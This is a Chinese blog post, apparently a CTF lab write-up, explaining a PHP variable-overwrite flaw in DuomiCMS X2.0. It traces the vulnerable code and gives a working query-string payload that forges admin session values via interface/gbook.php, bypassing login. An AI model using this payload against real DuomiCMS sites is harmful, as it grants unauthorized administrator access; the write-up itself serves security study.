[zkaq靶场]变量覆盖--duomi cms通杀漏洞

最新推荐文章于 2022-07-13 23:18:23 发布
最新推荐文章于 2022-07-13 23:18:23 发布
阅读量994 收藏
点赞数 2
分类专栏: zkaq靶场 文章标签: php 变量覆盖 duomicms 代码审计 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116710428
版权

变量覆盖

变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。

经常导致变量覆盖漏洞场景有:

$$使用不当;

extract()函数使用不当;

parse_str()函数使用不当;

import_request_variables()使用不当,开启了全局变量注册等。

$$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。

例如:

<?php
$a = 1;
foreach(array('_COOKIE','_POST','_GET') as $_request) {
foreach($$_request as $_key=>$_value) 
{$$_key=addslashes($_value);}}
echo $a;
?>
// $a 完全可以由传参决定。

靶场

duomicms-v2.0

本地测试

安装

image-20210512105258471

审计

发现这个地方可能存在变量覆盖:/duomiphp/common.php

image-20210512110027794

跟我们上面提到的结构很相像。

我们可以自己构造变量去覆盖原有的变量。

image-20210512110425357

这段代码不在任何条件当中,正常往下的流程就会执行到这里。

那么,我们需要找到哪里使用到这个文件和这段代码。

查看包含了common.php的地方:

image-20210512113632638

先看看后台登录的地方,调用了common.php。

image-20210512111958924

login.php查看了一下,没有可以构造变量的地方。

但是login.php包含了check.admin.php。

image-20210512121910689

check.admin.php中的keepUser方法在login.php被使用了

image-20210512122025402

image-20210512122117500

是一个登录判断的功能。登录成功之后会保存用户的session。

我们的漏洞点就是构造$_SESSION变量,成功登录到管理员后台。

而$_SESSION变量我们可以进行变量覆盖。

为了能成功登录到管理员后台,我们需要知道session中包含哪些东西。

check.admin.php:

_ S E S S I O N [ \_SESSION[ _SESSION[this->keepUserIDTag] = $this->userID;
_ S E S S I O N [ \_SESSION[ _SESSION[this->keepgroupidTag] = $this->groupid;
S E S S I O N [ _SESSION[ SESSION[this->keepUserNameTag] = $this->userName;

image-20210512122920935

显然,我们需要构造的有:

$_SESSION[duomi_admin_id]=userID

$_SESSION[duomi_group_id]=groupid

$_SESSION[duomi_admin_name]=userName

那么让这些值等于什么才能是管理员权限呢?

userID与userName 好理解,就是用户id与用户名嘛。

那groupid是什么呢?

全文搜索一下:/admin/admin_manager.php

image-20210512123638152

groupid=1即为系统管理员。

经过搜索,userID与userName是可以任意构造的。

那么我们的payload也就形成了:

_SESSION[duomi_admin_id]=11&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=666

其实构造userID与groupid就行了。

那么构造好了payload需要在哪里使用呢?

既然与session有关,那必然要使用session_start()。

所以需要找到同时包含common.php与使用session_start()的地方。

image-20210512124512751

interface/gbook.php:下可以成功执行。

http://192.168.17.144/Duomicms_X2.0/upload/interface/gbook.php?_SESSION[duomi_admin_id]=11&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=666

成功登录到后台,无需账户与密码。

image-20210512125003201

interface/comment.php

interface/comment.php/api/index.php

interface/comment.php/api/send.php

member/cpwd.php

member/exchange.php

member/exit.php

…等等这些路径下也可以执行,没有全部测试。但是应该大部分都可以。

靶场:

_SESSION[duomi_admin_id]=11&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=123

image-20210512115145305

拿到flag:

image-20210512115234814

wwxxee
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
多米cms(duomicms变量覆盖漏洞(超详细)
kiwi的博客
11-01 838
本文章我借鉴了代码审计实战 - FreeBuf网络安全行业门户的文章,文章写的比较详细,大家也可以看看他写的文章。
变量覆盖 --- zkaq
weixin_38237216的博客
04-27 1924
1.概念 1.变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 2.常见的变量覆盖的危险函数 extract()函数:将数组中变成变量 举例:<?php $a = “1”; $my_array = array(“a” => “Cat”,“b” => “Dog”, “c” => “Horse”); extract($my_array); echo “$a = $a; $b = $b; $c = $c”; ?> 运行结果:$a = Cat; $b = Dog; $
Duomicms变量覆盖漏洞
B_roin的博客
04-19 594
变量覆盖 1.变量覆盖是指可以用我们的传参值替换程序原有的变量值 2.经常导致变量覆盖漏洞场景有:$$(可变变量)使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等 1 . extract()函数:从数组中将变量导入到当前的符号表 (来源:菜鸟教程) [该函数使用数组键名作为变量名,使用...
代码审计duomicms变量覆盖漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-16 659
变量覆盖漏洞 什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 如下 <?php $a=123; $a=1; echo $a; ?> 怎么去寻找变量覆盖? 经常导致变量覆盖漏洞场景有: $$使用不当,extract()函数使用不当,parse_str()函数使用不当import_request_variables()使用不当,开启了全局变量注册等。 经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variab
Duomicms变量覆盖
yqdid的博客
04-20 348
Duomicms变量覆盖漏洞 由于是第一次搞这个 ,不是很懂。。 所以 思路是参考这位博主的 https://www.cnblogs.com/Qiuzhiyu/p/11923471.html 首先去了解一下 变量覆盖漏洞的原理: 变量覆盖漏洞是指可以用我们自定义的参数值替换程序原有的变量值,从而产生漏洞。大多都是由于函数使用不当导致,经常导致变量覆盖漏洞的函数有:extract()函数、pars...
DuoMiCms资源采集插件 v3.1.zip
07-14
DuoMiCms资源采集插件 更新日志: 2016-10-06更新说明: ...DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 DuoMiCms资源采集插件页面展示 相关阅读 同类推荐:站长常用源码
duomi分析工具测试
10-26
"duomi分析工具测试"是一个关于使用特定的分析工具——Duomi进行测试的主题。Duomi工具可能是一款专门针对数据、媒体或系统性能进行分析的应用程序。在这个过程中,"测试"一词表明我们正在评估该工具的功能、性能...
duomi:duimitouzi
06-25
《Duomi: 外汇期权交易平台的JavaScript实现详解》 Duomi,又称为"duomitouzi",是一个专门用于外汇期权交易的平台。外汇期权是金融衍生工具的一种,允许投资者在约定的时间内以特定价格买入或卖出某种货币对的权利...
duomi:多米互动游戏官网
05-05
文件名称"duomi-master"很可能代表了项目的主分支或源代码仓库,包含了所有构建该网站所需的文件和资源。这样的项目常会包含HTML文件(用于页面结构)、CSS文件(控制样式和布局)、JavaScript文件(处理交互逻辑...
多米(DuomiCms)影视管理系统 X2.0
10-22
DuomiCms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。DuomiCms是基于PHP+MySql技术开发的影视管理系统,强劲功能、卓越性能、安全健壮。简单易用、制作模板方便。构架稳健,平滑升级。多米(DuomiCms)影视管理系统 更新日志:X2.0修复cms播放器调用修改_支持任意目录安装整合link播放器修复顶部模板错位修复播放器错位后期资源不在纳入版本更新中,资源自动更新。X1.1修复解析播放器修复后台推广选项X1.0核心文件开源 新增采集资源管理[资源库列表&资源库管理]新增下载来源管理新增资源API插件[共享自己资源给别人采集] 后台控制开关 文件在根目录zyapi.php新增百度推送新增微信公众号新增首页公告,可
DuoMiCms资源采集插件 v2.0
12-05
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。
多米(DuomiCms)影视管理系统 视频点播系统 视频网站源码
01-05
DuomiCms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 DuomiCms是基于PHP+MySql技术开发的影视管理系统,强劲功能、卓越性能、安全健壮。简单易用、制作模板方便。构架稳健,平滑升级。 多米(DuomiCms)影视管理系统 v1.32 更新日志: 修复迅雷下载功能 修复模板错位代码 修复后台第三方采集资源 修复延迟加载图片以及代码 美化后台部分代码 去除部分无效代码 新增显示官方版本 新增官方资源 新增14个解析播放器 修复无效播放器默认支持解析
多米(DuomiCms)影视管理系统
02-01
一套完整的多米(DuomiCms)影视管理系统
多米(DuomiCms)影视管理系统 v1.3 utf-8
12-06
多米影视管理系统(DuomiCms,多米CMS)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需3分钟即可建立一个海量的视频讯息的行业网站。 DuomiCms采用PHP+MYSQL架构,原生PHP代码带来
利用爬虫批量下载songtaste歌曲-java实现
07-12
http://huodong.duomi.com/songtaste/?songid=2202703 ③.在②的url页面中找到mp3文件资源位置的url 类似这种http://me.songtaste.com/2011/3/23/fas23asdr234asdfas234.mp3 ④.然后根据③的url把歌曲想下载下来 ⑤...
渗透测试基础 -变量覆盖漏洞
weixin_45488495的博客
05-03 488
渗透测试基础-变量覆盖漏洞变量变量覆盖发生的函数变量覆盖靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 变量 说到变量覆盖,那我们得回回课了,什么是变量变量是如何被覆盖的? 变量一般比作盒子,我们可以在盒子里面放入东西,如果盒子多了,就得跟他们贴上标签,方便查找和调取。以这里的比喻来说,标签就是变量名,盒子里面的东西就是变量值。 但这个盒子有个特点:就是一个盒子,只能存放一个东西,如果想要放入其他东西,就得将上一个物
Duomicms_X2.0变量覆盖漏洞复现
seek_2022的博客
07-13 1676
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
【网络安全】Duomicms变量覆盖漏洞从白盒测试到实战
HBohan的博客
04-22 1782
声明:本次实践是在合法授权情况下进行,数据已经全部加密,主要是提供思路交流学习,请勿用于任何非法活动,否则后果自负。 本地代码走查 本次白盒代码测试的cms是DuomiCms,这次使用Seay工具进行代码审查,下载DuomiCms源码,然后工具加载。 先全局搜索危险函数,依次排查; extract();//把数组编程变量 parser_str();//把字符串变成变量 $$; //可变变量,将变量的值读出来然后再赋值为变量 在函数定位后,在文件中依次寻找有用性的文件后缀内容,如下所示; //此类后.
DuomiCms
qq_45835337的博客
04-19 540
根据观察,管理用户界面是admin.php,于是打开 require_once(dirname(__FILE__).'/../duomiphp/common.php'); require_once(duomi_INC."/check.admin.php"); if(empty($dopost)) { $dopost = ''; } //检测安装目录安全性 if( is_dir(dirname(_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值